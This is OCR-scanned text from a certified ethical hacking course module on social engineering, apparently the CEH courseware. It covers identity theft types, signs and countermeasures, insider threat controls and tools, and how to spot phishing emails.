Involuntary Data Leakage: In the absence of a strong policy that sets clear lines between personal and corporate content, employees may unknowingly post sensitive data about their company on social networking sites, which might help an attacker to launch an attack on the target organization. Targeted Attacks: Attackers use the information posted on social networking sites to launch targeted attacks on specific users or companies. Network Vulnerability: All social networking sites are subject to flaws and bugs such as login issues and Java vulnerabilities, which attackers could exploit. This could, in turn, lead to the leakage of confidential information related to the target organization’s network. Spam and Phishing: Employees using work e-mail IDs on social networking sites will probably receive spam and become targets of phishing attacks, which could compromise the organization’s network. Modification of Content: In the absence of proper security measures and efforts to preserve identity, blogs, channels, groups, profiles, and other platforms can be spoofed or hacked.
Module 09 Page 1379
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
=
Malware Propagation: Social networking sites are ideal platforms spread viruses, bots, worms, trojans, spyware, and other malware.
for attackers
to
=
Business Reputation: Attackers can falsify information about an organization employee on social networking sites, resulting in loss of reputation.
=
Infrastructure and Maintenance Costs: Using social networking sites entails added infrastructure and maintenance resources for organizations to ensure that their defensive layers are effective safeguards.
=
Loss of Productivity: Organizations must monitor employees’ network activities to maintain security and ensure that such activities do not misuse the system and company
or an
resources.
Module 09 Page 1380
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
C/EH
LO#05: Explain Identity Theft
nis Strictly Pro
Identity Theft
CE H
‘@ Identity theft is a crime in which an imposter steals your personally identifiable information such as name, credit card number, social security or driver's license numbers, etc. to commit fraud or other
crimes \@ Attackers can use identity theft to impersonate employees of a target organization and physically
access facilities
Types of Identity Theft
Module 09 Page 1381
© Child identity theft © Criminal identity theft © Financial identity theft © Driver's license identity theft
© © © ©
Medical identity theft Taxidentity theft Identity cloning and Concealment Synthetic identity theft
©
©
Social security identity theft
Insuranceidentity theft
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Identity Theft (Cont’d)
CE H
Common Techniques Attackers Use to Obtain Personal Information for Identity Theft
Theft of wallets, computers, laptops, cell phones, etc.
Pretextin;
Internet searches
Pharming
social engineering
Hacking (compromisinga
a Dumpster divingand 8 shoulder surfing
Phishing
Skimming
Indications of Identity Theft
@
8
Unfamiliar charges to your credit card
that you do not recognize
@ No longer receiving credit card, bank, or utility statements
user's system)
© Getting calls from the debit or credit fraud control department
Malware
© Charges for medical treatment or services
Wardriving
younever received
© No longer receiving electricity, gas, water, etc. service bills
Mail Theft and Rerouting
Identity Theft Identity theft is a problem that many consumers face today. In the United States, some state legislators have imposed laws restricting employees from providing their SSNs (Social Security Numbers) during their recruitment. Identity theft frequently figures in news reports. Companies should be informed about identity theft so that they do not endanger their own anti-fraud initiatives.
This section discusses identity theft, including types of identity theft, common techniques attackers use to obtain personal information for identity theft, and various indications of identity theft. The Identity Theft and Assumption Deterrence Act of 1998 defines identity theft as the illegal use of someone’s identification. Identity theft occurs when someone steals others’ personally identifiable information for fraudulent purposes. Attackers illegally obtain personally identifying information to commit fraud or other criminal acts. Types of personally identifiable information stolen by identity thieves: =
Name
=
Bank account number
=
Home and office address
=
Credit card information
=
Social security number
=
Credit report
=
Phone number
=
Driving license number
=
Date of birth
=
Passport number
Module 09 Page 1382
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Social Engineering
The attacker steals people’s identity for fraudulent purposes such as: =
To open new credit card accounts in the name of the user without paying the bills
=
To open anew phone or wireless account in the user’s name, or to run up charges on their existing account
=
To use the victims’ information to obtain utility services such as electricity, heating, or cable TV
=
To open bank accounts with the intention of writing bogus checks using the victim’s information
=
To clone an ATM or debit card to make electronic withdrawals from the victim’s
=
To obtain loans for which the victim is liable
=
To obtain a driver’s license, passport, or other official ID card that contains the victim’s data with the attacker’s photos
=
Using the victim’s name and Social Security number to receive their government benefits
=
To impersonate an employee of a target organization to physically access its facility
=
To take over the victim’s insurance policies
=
To sell the victim’s personal information
=
To order goods online using a drop-site
=
To hijack email accounts
=
To obtain health services
=
To submit fraudulent tax returns
=
To commit other crimes with the intention of providing the victim’s name to the authorities during arrest, instead of their own
accounts
Types of Identity Theft Identity theft is constantly increasing, and identity thieves are finding new ways or techniques to steal different types of target information. Some of the types of identity theft are as follows: =
Child Identity Theft This type of identity theft occurs when the identity of a minor is stolen. This is desirable because it may go undetected for a long time. After birth, parents apply for a Social Security Number for their child, which along with a different date of birth, is used by identity thieves to apply for credit accounts, loans or utility services, or to rent a place to live and apply for government benefits.
Module 09 Page 1383
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering =
Exam 312-50 Certified Ethical Hacker
Criminal Identity Theft This is one of the most common and most damaging types of identity theft. A criminal uses someone’s identity to escape criminal charges. When they are caught or arrested, they provide the assumed identity. The best way to protect against criminal identity theft is to keep all personal information secure, which includes following safe Internet practices and being cautious of “shoulder surfers.”
=
Financial Identity Theft This type of identity theft occurs when a victim’s bank account information is stolen and illegally used by a thief. They can max out a withdraw money from the account, or can use the stolen identity account, apply for new credit cards, and take out loans. The information to hack into the victim’s account and steal their information is obtained phishing attacks, or data breaches.
=
or credit card credit card and to open a new that is required through viruses,
Driver’s License Identity Theft
This type of identity theft is the easiest as it requires a little sophistication. A person can lose their driver’s license, or it can easily be stolen. Once it falls into the wrong hands, the perpetrator can sell the stolen driver’s license or misuse it by committing traffic violations, of which the victim is unaware of and fails to pay fines for, ending up with their license suspended or revoked. =
Insurance Identity Theft
Insurance identity theft is closely related to medical identity theft. It takes place when a perpetrator unlawfully takes the victim’s medical information to access their insurance for medical
treatment.
Its effects
include
difficulties
in settling
medical
bills,
higher
insurance premiums, and probable trouble in acquiring future medical coverage. =
Medical Identity Theft This is the most dangerous type of identity theft where the perpetrator uses the victim’s name or information without the victim’s consent or knowledge to obtain medical products and claim health insurance or healthcare services. Medical identity theft results in frequent erroneous entries in the victim’s medical records, which could lead to false diagnoses and life-threatening decisions by the doctors.
=
Tax Identity Theft This type of identity theft occurs when the perpetrator steals the victim’s Social Security Number to file fraudulent tax returns and obtain fraudulent tax refunds. It creates difficulties for the victim in accessing their legitimate tax refunds and results in a loss of funds. Phishing emails are one of the main tricks used by the criminal to steal a target’s information. Therefore, protection from such identity theft includes the adoption of safe Internet practices.
Module 09 Page 1384
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Identity Cloning and Concealment This type of identity theft encompasses all forms of identity theft, where the perpetrators attempt to impersonate someone else simply in order to hide their identity. These perpetrators could be illegal immigrants, those hiding from creditors, or simply those who want to become “anonymous.” Synthetic Identity Theft This is one of the most sophisticated types of identity theft, where the perpetrator obtains information from different victims to create a new identity. Firstly, he steals a Social Security Number and uses it with a combination of fake names, date of birth, address, and other details required for creating a new identity. The perpetrator uses this new identity to open new accounts, loans, credit cards, phones, other goods, and services. Social Identity Theft This is another common type of identity theft where the perpetrator steals victim’s Social Security Number in order to derive various benefits such as selling it to an undocumented person, using it to defraud the government by getting a new bank account, loans, credit cards, or applying for and obtaining a new passport.
Common Theft
Techniques Attackers Use to Obtain Personal Information for Identity
Discussed below are some of the methods by which attackers steal targets’ identities, which in turn allow them to commit fraud and other criminal activities: Theft of wallets, computers, laptops, cell phones, backup media, and other sources of personal information Physical theft is common. Attackers steal hardware from places such as hotels and recreational places such as clubs, restaurants, parks, and beaches. Given adequate time, they can recover valuable data from these sources. Internet Searches Attackers can gather a considerable amount of sensitive information Internet sites, using search engines such as Google, Bing, and Yahoo!.
via
legitimate
Social Engineering Social engineering is the art of manipulating people into performing certain actions or divulging personal information and accomplishing their task without using cracking methods. Dumpster Diving and Shoulder Surfing Attackers rummage through household garbage and the trash bins of organizations, ATM centers, hotels, and other places to obtain personal and financial information for fraudulent purposes.
Module 09 Page 1385
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering Criminals may find user information identification numbers (PINs) typed overhearing conversations. =
Exam 312-50 Certified Ethical Hacker by glancing at documents, observing personal into automatic teller machines (ATM), or by
Phishing The “fraudster” may pretend to be from a financial institution or other reputable organization and send spam or pop-up messages to trick users into revealing their personal information.
=
Skimming Skimming refers to stealing credit or debit card numbers by using special storage devices called skimmers or wedges when processing the card.
=
Pretexting
Fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses. They rely on “smooth-talking” and win the trust of an individual to reveal sensitive information. =
Pharming Pharming, also known as domain spoofing, is an advanced form of phishing in which the attacker redirects the connection between the IP address and its target server. The attacker may use cache poisoning (modifying the Internet address to that of a rogue address) to do so. When the users type in the Internet address, it redirects them to a rogue website that resembles the original.
=
Hacking (compromising a user’s system) Attackers may compromise user systems and router information using listening devices such as sniffers and scanners. They gain access to an abundance of data, decrypt it (if necessary), and use it for identity theft.
=
Keyloggers and Password Stealers (Malware)
An attacker may infect the user’s computer with trojans, viruses, or other malware and then record and collect the user’s keystrokes to steal passwords, usernames, and other sensitive information of personal, financial, or business import. Attackers may also use emails to send fake forms, such as Internal Revenue Service (IRS) forms, to gather information from their victims. =
Wardriving Attackers search for unsecured Wi-Fi wireless networks in moving vehicles containing laptops, smartphones, or PDAs. Once they find unsecured networks, they access any sensitive information stored on the devices of the users on those networks.
=
Mail Theft and Rerouting Often, mailboxes contain bank documents (credit cards or account statements), administrative forms, and other important correspondence. Criminals use this information to obtain credit card information or to reroute the mail to a new address.
Module 09 Page 1386
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Indications of Identity Theft People do not realize that they are unknown and unauthorized issues importance that people watch out compromised. Listed below are some
the victim of identity theft until they experience some as a result of the theft. Therefore, it is of paramount for the warning signs that their identities have been of the signs of identity theft:
Unfamiliar charges to your credit card that you do not recognize. No longer receive credit card, bank, or utility statements Creditors call asking about an unknown account on your name. There are numerous traffic violations under your name that you did not commit. You receive charges for medical treatment or services you never received. There is more than one tax return filed under your name. Being denied access to your own services.
account and unable to take out loans or use other
Not receiving electricity, gas, water, or other services bills due to stolen mail.
Sudden changes in your personal medical records showing a condition you do not suffer from. Some additional indications of identity theft are as follow: Getting a notification that your information was compromised or misused breach in a company where you are an employee or have an account.
by a data
An inexplicable cash withdrawal from your bank account. Calls from debit or credit card fraud suspicious activities on your accounts.
control
departments
giving
warnings
about
A refusal of government benefits to you and your child because those benefits are already being received by some other account using your child’s Social Security Number. Your medical insurance plan rejects your authentic medical claim because tampered with your medical records, causing you to reach your benefit limit.
Module 09 Page 1387
someone
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
CEH
LO#06: Explain Social Engineering Countermeasures
Social Engineering Countermeasures Social engineers exploit human behavior (such as manners, enthusiasm toward work, laziness, or naivete) to gain access to the targeted company’s information resources. Social engineering attacks are difficult to guard against, as the victim might not be aware that he or she has been deceived. They are very much like the other kinds of attacks used to extract a company’s valuable data. To guard against social engineering attacks, a company needs to evaluate the risk of different kinds of attacks, estimate possible losses and spread awareness among its employees.
This section deals with countermeasures that an organization can implement to be more secure against social engineering attacks.
Module 09 Page 1388
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Social Engineering Countermeasures
CE H
@ Good policies and procedures are ineffective they are not taughtand reinforced by employees @ After receiving training, employees should sign a statement acknowledging that they understand the policies @ The main objectives of social engineering defense strategies are to create user awareness, robustinternal network controls, and secure policies, plans, and processes Password Policies
@ Periodic password changes © Avoiding guessable passwords . | @
Account blocking after failed attempts
Physical Security Policies
© Identification of employees by issuingID cards, uniforms, etc. © Escorting visitors @
Restricting access to work areas
© Increasing length and complexity
© Proper shredding of useless
© Improvingsecrecy of passwords
© Employing security personnel
of passwords
Defense Strategy
@ Social engineering campaign , © Gapanalysis _ ©
Remediation strategies
—
documents
iv |
L|
Social Engineering Countermeasures (Cont’d)
CE H
3 | Train individualson security policies
[6 | Background check and proper termination process
[2 | Implement proper access privileges
[7 | Anti-virus/anti-phishing defenses
[3 |
[a |
Presence of proper incidence response time
Implement two-factor authentication
| 4 | Availability of resources only to authorized users
| 9 | Adopt documented change management
is | Scrutinize information
| 10 | Ensure software is regularly updated s Reserved. Reproduction is Strictly Prohibited
Social Engineering Countermeasures Attackers implement social engineering techniques to trick people into revealing organizations’ confidential information. They use social engineering to perform fraud, identity theft, industrial espionage, and other disreputable behaviors. To guard against social engineering attacks, organizations must develop effective policies and procedures; however, merely developing them is not enough.
Module 09 Page 1389
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
To be truly effective, an organization should:
Disseminate policies Specialized training engineering threats.
among employees and provide proper education and training. benefits employees in higher-risk positions against social
Obtain employee signatures on a statement acknowledging that they understand the organization’s policies. Define the consequences of policy violations. The main objectives of social engineering defense strategies are to create robust internal network controls, and security policies, plans, and processes. Official security policies and procedures help employees decisions. They should include the following safeguards:
or users
make
user awareness, the
right security
Password Policies Password policies stating the following guidelines help to increase password security: o
Change passwords regularly.
o
Avoid passwords that are easy to guess. It is possible to guess passwords from answers to social engineering questions such as, “Where were you born?” “What is your favorite movie?” or "What is your pet’s name?"
o
Block user accounts if a user exceeds a certain number of failed attempts to guess a password.
o
Choose long (minimum of 6 — 8 characters) alphanumeric and special characters) passwords.
o
Donot disclose passwords to anyone.
o
Set up a password expiration policy.
and
complex
Password Security policies often include advice on proper password example:
(using
management,
o
Avoid sharing a computer account.
o
Avoid using the same password for different accounts.
o
Avoid storing passwords on media
o
Avoid communicating passwords over the phone or through email or SMS.
o
Be sure to lock or shut down the computer before stepping away from it.
note.
or writing them
down
on a
various
notepad
for
or sticky
Physical Security Policies Physical security policies address the following areas. o
Issue identification cards (ID cards), and uniforms, along with other access control measures to the employees of the organization.
Module 09 Page 1390
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
o
Office security lounges.
or personnel
must
o
Restrict access to certain areas of an organization to prevent from compromising the security of sensitive data.
o
Dispose of old documents that contain valuable information by using equipment such as paper shredders and burn bins. This prevents information gathering by attackers using techniques such as dumpster diving.
o
Employ security personnel in an organization to protect people and property — supplement trained security personnel with alarm systems, surveillance cameras, and other equipment.
o
Dispose of devices characters.
by overwriting
escort
the
visitors to designated
disk’s content
with
visitor rooms
unauthorized
Os,
1s,
and
or
users
random
Defense Strategy o
Social Engineering Campaign: An organization should conduct numerous social engineering exercises using different techniques on a diverse group of people in order to examine how its employees might react to real social engineering attacks.
©
Gap Analysis: Using the information obtained from the social engineering campaign, a gap analysis evaluates the organization based on industry-leading practices, emerging threats, and mitigation strategies.
o
Remediation Strategies: Depending upon the result of the evaluation in the analysis, organizations develop a detailed remediation plan to mitigate weaknesses or the loopholes found in the earlier step. The plan focuses mainly educating and creating awareness among employees based on their roles identifying and mitigating potential threats to the organization.
gap the on and
Additional Countermeasures Against Social Engineering Train Individuals on Security Policies: An efficient training program consists of basic social engineering concepts and techniques, all security policies, and methods to increase awareness of social engineering. Implement Proper Access Privileges: There should be administrator, accounts with respective levels of authorization.
user, and guest
Presence of a Proper Incidence Response Time: There should be proper guidelines for reacting to a social engineering attempt. Availability of Resources Only to Authorized Users: Make sure sensitive information is secured and that resources are only accessed by authorized users Scrutinize Information: Categorize the information as top internal use only, and for public use, or use other categories.
secret,
proprietary,
for
Perform a Background Check and Proper Termination Process: Insiders with a criminal background and terminated employees are easy targets for procuring information. Module 09 Page 1391
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
=
Anti-Virus and Anti-Phishing Defenses: Use multiple layers of anti-virus defenses end-user and mail gateway levels to minimize social engineering attacks.
=
Implement Two-Factor Authentication: Instead of fixed passwords, use two-factor authentication for high-risk network services such as VPNs and modem pools. In the two-factor authentication (TFA) approach, the user must present two different forms of proof of identity. If an attacker is trying to break into a user account, then they need to break both forms of user identity, which is more difficult to do. Hence, TFA is a defensein-depth security mechanism and part of the multifactor authentication family. The two pieces of evidence that a user provides could include a physical token such as a card, and is typically something the person can remember without much effort, such as a security code, PIN, or password.
=
Adopt Documented Change Management: A documented change-management process is more secure than the ad-hoc process.
=
Ensure a Regular Update of Software: Organizations should ensure that the system and software are regularly patched and updated as the attackers exploit unpatched and outof-date software to obtain useful information to launch an attack.
=
Implement a Hardware Policy: Ensure that individuals are aware of what hardware can be used. For example, the use of USB drives should be disallowed.
=
Implement a Software Policy: Ensure that only legitimate specify the individuals responsible for software installation.
=
Verify Identity and Authorization:
=
software
is installed
at
and
o
Employees must verify the email header and the links provided in the mail before accessing them.
o
Employees must verify the identity of individuals requesting information.
Implement a Spam Filter: Set up spam filters to avoid inbox flooding and stop infected emails from reaching the device.
Module 09 Page 1392
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
al — |
How to Defend against Phishing Attacks?
CE H
Educate individuals by conducting phishing campaigns
oo a
Check emails for generic salutations, spelling, and grammar mistakes
feo]
SS @
Hover over links to identify whether they point to the correct location
5
Enable spam filters that detect emails from suspicious sources
Confirm the sender before providing the information via email Ensure that employees use HTTPS-protected websites
Verify the profile pictures of a suspicious account by performing a reverse image search Immediately report social media accounts confirmed to be fake
How to Defend against Phishing Attacks? Listed below are some countermeasures against phishing attempts: Educate individuals by conducting phishing campaigns. Enable spam filters that detect emails from suspicious sources. Avoid responding to emails requesting sensitive information. Hover over links to identify whether they point to the correct location. Never provide credentials over the phone. Check emails for generic salutations, spelling, and grammar mistakes. Confirm the sender before providing any requested information via email.
Ensure that employees use HTTPS-protected websites. Implement multi-factor authentication (MFA) to prevent whaling attacks. Individuals should contact the organization provided on the official website.
via email
addresses
or phone
numbers
Verify the profile pictures of a suspicious account by performing a reverse image search. Immediately report social media accounts confirmed to be fake. Lodge a complaint at a cybercrime office if any social media account engages in bullying for money.
Module 09 Page 1393
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Detecting Insider Threats
CE H
Insider Risk Controls
@ Insider data risk presents another layer of complexity for security professionals, which requires designingsecurity infrastructure that can efficiently monitor user permissions, access controls, : and user actions
Deterrence
@ The security framework must contain safeguards, recommended actions by the employee and IT professionals, separation of duties, assigning privileges, etc.
Controls
@ Security professionals can use tools such as DLP (Symantec Data Loss Prevention, SecureTrust Data Privacy, etc.) and IAM (SailPoint IdentitylQ, RSA SecurD Suite, etc.) to deter insiderthreats
@ Security professionals must use a varietyof security controls and tools to analyze and detect insider Detection Controls
threats
; ; | © Toolssuch as IDS/IPS (Check Point Quantum Intrusion Prevention System (IPS), IBM Security Network Intrusion Prevention System, etc.), Log Management (SolarWinds Security Event Manager, Splunk, etc.), and SIEM (ArcSight ESM, LogRhythm NextGen SIEM Platform, etc.) may be used
Detecting Insider Threats Most data attacks come from insiders, which only makes them more difficult to prevent or detect. Insiders are mostly aware of the security loopholes of the organization, and they exploit them to steal confidential information. It is essential to carefully handle insider threats as they are difficult to thwart and may incur huge financial losses and business interruptions. Some of the methods to detect insider threats are given below: Insider Risk Controls Insider data risk presents another layer of complexity for security professionals. It requires designing security infrastructure in such a way that user permissions, access controls, and user actions are monitored efficiently. Deterrence Controls
The organization’s security framework must contain safeguards, follow recommended actions of the employee and IT professionals, provide a separation of duties, and assign privileges. These security controls eliminate or minimize the security risks to the organization’s critical assets. The deterrence controls that the security professionals must have in place to deter insider threats are DLP (Data Loss Prevention) tools, and Identity and Access Management (IAM) tools.
Some of the deterrence controls are: o
DLP Tools:
e
Module 09 Page 1394
Symantec Data Loss Prevention (https://www.symantec.com)
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
o
=
Exam 312-50 Certified Ethical Hacker
e
SecureTrust Data Privacy (https://securetrust.com)
©
Check Point Quantum Data Loss Prevention (DLP) (https://www.checkpoint.com)
IAMTools:
e
SailPoint IdentitylQ (https://www.sailpoint.com)
e
RSA SecurID
©
Core Access Assurance Suite (https://www.coresecurity.com)
Suite (https://www.rsa.com)
Detection Controls Security professionals must use a variety of security controls and tools to analyze and detect insider threats in organizations. The detection controls that the security professionals must have in place to detect insider threats are IDS/IPS (Intrusion detection and prevention systems), log management systems, and Security Information and Event Management (SIEM) tools. Some of the detection controls are: o
o
o
IDS/IPS Tools o
Check Point Quantum Intrusion Prevention System (IPS) (https://www.checkpoint.com)
e
IBM Security Network Intrusion Prevention System (https://www.ibm.com)
e
USM Anywhere ( https://cybersecurity.att.com)
Log Management Tools e
SolarWinds Security Event Manager (https://www.solarwinds.com)
e
Splunk (https://www.splunk.com)
©
Loggly (https://www.loggly.com)
SIEM Tools
©
ArcSight ESM (https://www.microfocus.com)
e
LogRhythm NextGen SIEM Platform (https://logrhythm.com)
e
SolarWinds Security Event Manager (https://www.solarwinds.com)
Module 09 Page 1395
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Insider Threats Countermeasures [Oy separation and rotation of duties
Archive critical data
Least privileges
Employee training on cyber security
Controlled access
Employee background verification
Logging and auditing
Periodic risk assessment
Employee monitoring
Privileged users monitoring
Legal policies
Credentials deactivation for terminated employees s Reserved Reproduction
Insider Threats Countermeasures There are safety measures that help an organization to prevent or minimize insider threats: Separation and rotation of duties: Divide responsibilities among multiple employees to restrict the amount of power or influence held by any individual. This helps to avoid fraud, abuse, and conflict of interest and facilitates the detection of control failures (including bypassing security controls and information theft). Rotation of duties at random intervals helps an organization to deter fraud or the abuse of privileges. Least privileges: Provide users with only enough access privilege to allow them perform their assigned tasks. This helps maintain information security. Controlled access: Access controls in various parts of an organization unauthorized users from gaining access to critical assets and resources.
to
restrict
Logging and auditing: Perform logging and auditing periodically to check for misuse of
company resources.
Employee monitoring: Use employee monitoring software that records all user sessions, and that can be reviewed by security professionals. Legal policies: Enforce legal policies to prevent organization’s resources and sensitive data theft.
employees
from
misusing
the
Archive critical data: Maintain a record of the organization’s critical data in the form of archives to be used as backup resources, if needed. Employee training on cybersecurity: Train employees on how to protect their credentials and the company’s confidential data from attack. They will be able to identify social engineering attempts and take proper mitigations and reporting steps. Module 09 Page 1396
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
=
Employee background verification: Ensure thorough background checks of all employees before hiring them by using Google search and social networking sites and consulting previous employers.
=
Periodic risk assessment: Perform a periodic risk assessment on critical assets to identify vulnerabilities and implement protection strategies against both insider and outsider threats.
=
Privileged users monitoring: Implement additional monitoring mechanisms for system administrators and privileged users as these accounts can be used to can deploy malicious code or logic bomb on the system or network.
=
Credentials deactivation for terminated employees: Disable all the employee’s access profiles to the physical locations, networks, systems, applications, and data immediately after termination.
=
Periodic risk assessments: Perform periodic risk assessments on all the organization’s critical assets then develop and maintain a risk management strategy to secure those assets from both insiders and outsiders.
=
Layered defense: Implement multiple layers of defense to prevent and protect critical assets from remote attacks originated from insiders. Develop appropriate remote access policies and procedures to thwart such attacks.
=
Physical security: Build a professional security team that monitors the physical security of the organization.
=
Surveillance: Install video cameras to monitor screen-capturing software on all critical servers.
=
Zero-Trust Model: Implement a zero-trust model to limit access to critical assets of the organization. Furthermore, implement additional identity verification measures such as MFA to guarantee the secure use of the assets.
=
Behavioral Analytics: Employ user entity and behavioral analytics collect, and analyze the data to identify anomalous behavior.
Module 09 Page 1397
all critical
assets.
Install
and
(UEBA)
enable
to track,
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Identity Theft Countermeasures 1 |
Secure or shred all documents containing your private information
6 |
Be cautious and verify all requestsfor personal data
Ensure your name is not presentin marketers’
7 |
Protect your personal information from being
hit lists
3]
CEH
Review your credit card statement regularly and store it securely, out of reach of others
Keep° your mail secure by emptying the mailbox quickly
|
Do not display or share any account/contact numbers unless mandatory
Never give any personal information over the phone 5 |
publicized
|
Monit lonitor
0 |
online line
bankii banking
activities tivitis regularly lark
] |
Never list any personal identifiers on social media
Identity Theft Countermeasures Identity theft occurs when someone uses personal information (such as a name, social security number, date of birth, mother’s maiden name, or address) in a malicious way, such as for credit card or loan services, or even rentals and mortgages, without the person’s knowledge or permission.
Listed below are countermeasures that, on implementation, will reduce the chances of identity
theft:
Secure or shred all documents containing private information Ensure your name is not present on the marketers’ hit lists Review your credit card statement regularly and store it securely, out of reach of others
Never give any personal information over the phone To keep mail secure, empty the mailbox quickly Suspect and verify all requests for personal data Protect personal information from being publicized
Do not display account or contact numbers unless mandatory Monitor online banking activities regularly
Never list any personal identifiers on social media websites such as your father’s name, pet’s name, address, or city of birth. Enable two-factor authentication on all online accounts Never use public Wi-Fi for sharing or accessing sensitive information Module 09 Page 1398
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Install host security tools such as a firewall and anti-virus on your personal computer Some additional countermeasures against identity theft are as follows: To keep mail secure, empty your mailbox quickly and do not reply to unsolicited email requests asking for personal information. Shred credit card offers and “convenience checks” that are not useful. Do not store any financial information on the system and use strong passwords for all financial accounts. Check telephone and cell phone bills for calls you did not make. Keep your Social Security card, passport, license, and other valuable personal information hidden and secured. Read website privacy policies. Be cautious before clicking on a link provided in an email or instant message. Enter personal information only on secured website pages marked with “https.” Add fraud alerts to the system or device to defend against identity theft. Do not allow family members or friends to open a personal account. Utilize trusted digital wallets that provide high security.
Module 09 Page 1399
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
How to Detect Phishing Emails? Appearsto be froma bank, company, or social networking site, and has a generic greeting Appears to be from a person listed in your email address book Gives a sense of urgency or a veiled threat May contain grammatical/spelling mistakes Includes links to spoofed websites
May contain offers that seem to be too good to be true
Includes official-looking logos and other information taken from legitimate websites May contain a malicious attachment
How to Detect Phishing Emails? To detect phishing Doing so will show then it could be display it’s “From”
emails, first, hover your mouse pointer over the name in the “From” column. whether the original domain name is linked to the sender’s name; if it is not, a phishing email. For example, an email from Gmail.com should probably domain as “gmail.com.”
Check to see if the email provides a URL and prompts the user to click on it. If so, ensure that the link is legitimate by hovering the mouse pointer over it (to display the link’s URL) and ensure it uses encryption (https://). To be on the safe side, always open a new window and visit the site by typing it in directly instead of clicking on the link provided in the email.
Do not provide any information to the suspicious website, as it will likely link directly to the attacker. A few other indicators of phishing emails: =
It seems to be from a bank, company, or social networking site and has a generic greeting
=
It seems to be from a person listed in your email address book
=
It has an urgent tone or makes a veiled threat
=
It may contain grammatical or spelling mistakes
=
It includes links to spoofed websites
=
It may contain offers that seem to be too good to be true
=
It includes official-looking logos and other information taken from legitimate websites
=
It may contain a malicious attachment
Module 09 Page 1400
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Social Engineering
joogle.com/mail/u/O/?ui
Your Apple ID was used to sign in to iCloud on an iPhone 6 ©®
[Intex
x)
[BB Apple Support
12:11 PM (20 minutes ago)
‘Your Apple 1D was used to sign in to iCloud on an iPhone 6 Time:
April 13, 2622
Operating System: 10S 6.0.1
Your Apple 1D was used to sign in to iCloud on an iPhone 6 and your crecit card has been { goed for $1285.54 i “TF you recently signed in to this device. you can disregard this email
If you have not recently signed in to an iPhone with your Apple ID and believe someone may have acesed your account, please click password
4
to confirm your details and change your
To spread awareness on the security issues,
reporting this issue at the link to Reporiyibuse View the attached
TE.
document for your latest invoice
Apple Support
My Apple ID | Support | Privacy Policy Copyright © 2022 Tunes S.ar!, 31-33, rule Sainte Zithe, L-2763 Luxembourg. Alt rights
Figure 9.16: Screenshot Showing an Email with Indications of Phishing
Module 09 Page 1401.
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Anti-Phishing Toolbar |@ The Netcraft anti-phishing community is a
Netcraft
|
giant neighborhood watch scheme, empowering the most alert and most expert members to defend everyone within the community against phishing attacks
